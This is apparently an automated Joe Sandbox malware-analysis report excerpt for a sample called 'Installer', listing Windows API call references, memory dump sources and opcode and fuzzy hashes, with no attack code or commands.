• GetLastError.KERNEL32 ref: 0036433C
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 003472C5
• std::_Throw_Cpp_error.LIBCPMT ref: 00347395
• std::_Throw_Cpp_error.LIBCPMT ref: 003473A3
• std::_Throw_Cpp_error.LIBCPMT ref: 003473B1
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$CurrentThread
• String ID:
• API String ID: 2261580123-0
• Opcode ID: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
• Instruction ID: 17b88929fa81679bba1cb67cd21e432eff9166c0050404f0a018cc46265c00cf
• Opcode Fuzzy Hash: 0a0724cb2bcc2cb005b20a0bc0532c92612577da9d573906679323a01a4e99cf
• Instruction Fuzzy Hash: 4941D2B59047058BDB22EF64C941BAAB7E8FF44320F158639E8165F691EB34F814CBE1
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00344495
• std::_Lockit::_Lockit.LIBCPMT ref: 003444B2
• std::_Lockit::~_Lockit.LIBCPMT ref: 003444D3
• std::_Lockit::~_Lockit.LIBCPMT ref: 00344580
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
• Instruction ID: 368d973501749918024692db23e5f4060138b3bb412c735fd32ff84e6c6b3001
• Opcode Fuzzy Hash: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
• Instruction Fuzzy Hash: C0416871D006188FCF26DF98D884BADBBF4FB49320F054269E8196B391DB34A984CF91
APIs
  • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
• GetLastError.KERNEL32 ref: 00361E2A
• __dosmaperr.LIBCMT ref: 00361E31
• GetLastError.KERNEL32 ref: 00361E6B
• __dosmaperr.LIBCMT ref: 00361E72
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: ce684bc72ebb304fb26ba5765474dfb17e334713aced38d55cc750e42b650e68
• Instruction ID: 8bc2f35ff8a21187aeb032a5b14694d32dc86620d7e99aba21bb7ce4c20332d3
• Opcode Fuzzy Hash: ce684bc72ebb304fb26ba5765474dfb17e334713aced38d55cc750e42b650e68
• Instruction Fuzzy Hash: 5421F231600605AFDB23AF65D881C3BB7ACFF04365B19C518FC199B111D732EC008BA0
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 07f222de374cc442ee781565bdd4b8c8d9b13cea11c8fcad1fd30304ebdcffa6
• Instruction ID: 23f9d25a1c83684b93f08ca119a268316203ad9f59aafdab98bf130b82a09aec
• Opcode Fuzzy Hash: 07f222de374cc442ee781565bdd4b8c8d9b13cea11c8fcad1fd30304ebdcffa6
• Instruction Fuzzy Hash: D3219F71204605AF9B23AF69DC81D6B77ACFF42366B114515FC559B272EB30EC4887A0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 003631C6
  • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003631FE
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036321E
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
APIs
• __EH_prolog3.LIBCMT ref: 0034E899
• std::_Lockit::_Lockit.LIBCPMT ref: 0034E8A3
• int.LIBCPMT ref: 0034E8BA
  • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
  • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
• std::_Lockit::~_Lockit.LIBCPMT ref: 0034E914
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
• String ID:
• API String ID: 1383202999-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000), ref: 0036ADB7
• GetLastError.KERNEL32(?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?,?,00363CD6,00000000), ref: 0036ADC3
  • Part of subcall function 0036AE20: CloseHandle.KERNEL32(FFFFFFFE,0036ADD3,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?), ref: 0036AE30
• ___initconout.LIBCMT ref: 0036ADD3
  • Part of subcall function 0036ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0036AD91,0036A2DC,?,?,00364390,?,00000000,00000000,?), ref: 0036AE08
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?), ref: 0036ADE8
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00350507
• GetCurrentThreadId.KERNEL32 ref: 00350516
• GetCurrentProcessId.KERNEL32 ref: 0035051F
• QueryPerformanceCounter.KERNEL32(?), ref: 0035052C
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0035B893,?,?,00000000,00000000,00000000,?), ref: 0035B9B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 300bda08f8dab3499a93a391b771091bf9b658931e0c00da274dd551b825a908
                                                                                                                                                                                                                                                    • Instruction ID: b5af09d52566c6b8535ea93e5b8d7e0310d59ab860fdef90cee510f8ff9d0ecf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 300bda08f8dab3499a93a391b771091bf9b658931e0c00da274dd551b825a908
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88415931900249EFCF16DF94CC81EAEBBB5BF48301F198159FD14AB221D3359954DB91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0035B475
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                    • Opcode ID: 24f9bf80e67f899bdd3fe89874e0514ca63e5e081952399bf73781b5ba30c68c
                                                                                                                                                                                                                                                    • Instruction ID: bd95583374b4524900fbd54f8e52f8a5132a8e9b86138774bdf70f5e8668abf4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24f9bf80e67f899bdd3fe89874e0514ca63e5e081952399bf73781b5ba30c68c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31B4B1400219EBCF2B9F51C840CAAFB66FF0A316B194A5AFD4449132D332DD69DBC1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034B8B9
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?), ref: 0034B8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,03383FB8,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                      • Part of subcall function 00358353: IsProcessorFeaturePresent.KERNEL32(00000017,0035C224), ref: 0035836F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 1efde886dd8fe6b0c50067b2894e63f5b14044107227fde69f2e4f2a3e44db4a
                                                                                                                                                                                                                                                    • Instruction ID: 6fd867c1edb22f4dfcf11d0c4d9ec3cabdf6f637751b9cb28c5d870b53d0067e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1efde886dd8fe6b0c50067b2894e63f5b14044107227fde69f2e4f2a3e44db4a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28212332E00258ABCF269F99D845AAEF7F9AF44710F1A0419E906AF251CB74FD458B81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 66bb4888f5b7bc7a29bae4c50870ed2daf896f8466fe31295beb6ff27b1124d0
                                                                                                                                                                                                                                                    • Instruction ID: 7575760331b262d4d5252574687621eab1024c7ca8812d132648d09d717308a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66bb4888f5b7bc7a29bae4c50870ed2daf896f8466fe31295beb6ff27b1124d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D10171F1614301ABDB159F28D855A5BBBE8DF08318F11881CF45D9F351D379E858CB81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,03383FB8,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction ID: 9cea460e9543a65c50e711778be0718b2a77089908f449da2b5c7e84535b5cae
• Opcode Fuzzy Hash: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
• Instruction Fuzzy Hash: 00F0F8F5A14300ABD715AF18D945B47BBE4EB49719F01C81CF9989B310D3B9D458CB92
APIs
  • Part of subcall function 0035C16A: GetLastError.KERNEL32(00000000,?,0035E58D), ref: 0035C16E
  • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00358363), ref: 0035C210
• GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0036138F
• IsValidCodePage.KERNEL32(00000000), ref: 003613CD
• IsValidLocale.KERNEL32(?,00000001), ref: 003613E0
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00361428
• GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00361443
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID: ,K7
• API String ID: 415426439-1697011031
• Opcode ID: cc8ed280dc08685d19b91772408b240f643a98487a1a2a6f58784d3f8b840459
• Instruction ID: c32a4522b7336582df8ba3b5243482cd12176ad5297fe9fc78d10fb8d6e83ebd
• Opcode Fuzzy Hash: cc8ed280dc08685d19b91772408b240f643a98487a1a2a6f58784d3f8b840459
• Instruction Fuzzy Hash: 44517072A10605AFDB23DFA5CC45EBE77B8EF05700F198469F905EB194EB709A44CB60
APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AA0
• GetLocaleInfoW.KERNEL32(?,20001004,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AC9
• GetACP.KERNEL32(?,?,003613BD,?,00000000), ref: 00361ADE
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
• Instruction ID: 2ea98b674b87bdf1db4fa5ce46ef860c48b9a2afc83c2a117bc9dacec4f631cf
• Opcode Fuzzy Hash: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
• Instruction Fuzzy Hash: 84218622B02101ABD737CFE5C901A9772BAEB54B54B5FC564E90ADB20CE732DD40D350
APIs
  • Part of subcall function 00341240: _strlen.LIBCMT ref: 003412BA
• GetFileSize.KERNEL32(00000000,00000000), ref: 00342046
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0034206B
• CloseHandle.KERNEL32(00000000), ref: 0034207A
• _strlen.LIBCMT ref: 003420CD
• CloseHandle.KERNEL32(00000000), ref: 003421FD
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: CloseFileHandle_strlen$ReadSize
• String ID:
• API String ID: 1490117831-0
• Opcode ID: bdd66fb108b55ba99c41e22f0f32ae93551cbf00bc5057087eee6b02b528882d
• Instruction ID: b9aa5d24326e26988dc5b3429dede176647a62f2cdeb772af169db629587cc50
• Opcode Fuzzy Hash: bdd66fb108b55ba99c41e22f0f32ae93551cbf00bc5057087eee6b02b528882d
• Instruction Fuzzy Hash: 5471D0B2C006089BCB12DFA4DC45BAEBBF5BF48314F150629F814BB391E775A945CBA1
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
• Instruction ID: ca032691a71f72c14cc1531e28e5ac15cbca6907ad26b225a267cf54a867a23a
• Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
• Instruction Fuzzy Hash: A4024D71E006199BDF15CFA8C880BAEBBF1FF48315F25826AD915E7390D731AA05CB90
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003620D9
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: FileFindFirst
• String ID:
• API String ID: 1974802433-0
• Opcode ID: b0cd69994b50927011dc60df9c7aeb4e5c8ff437ebb0c57776a33832127ad0d4
• Instruction ID: b5c4f26aff0b0281b62aa8a75ce17c67d37369d39ac3d08a288238d26a83c6b9
• Opcode Fuzzy Hash: b0cd69994b50927011dc60df9c7aeb4e5c8ff437ebb0c57776a33832127ad0d4
• Instruction Fuzzy Hash: 7F7123B19055595FCF33AF34DC99AFBB7B8AB05300F1A81D9E448A7215DB304E848F50
APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0034F8F5
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0034F9C1
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034F9DA
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0034F9E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
                                                                                                                                                                                                                                                    • Instruction ID: 138bf7a91a1b20c4f867558ebdda8feab40f320dd9812732851e6fe31b3834a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31D775D052199BDF22DFA5D949BCDBBF8AF08300F1041AAE40DAB250EB719A848F45
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035D2B4: HeapAlloc.KERNEL32(00000008,00343D4A,00000018,?,0035C308,00000001,00000364,00000018,FFFFFFFF,000000FF,?,003576E9,0035BF54,00000000,?,0034A67D), ref: 0035D2F5
                                                                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003620D9
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003621CD
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0036220C
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0036223F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
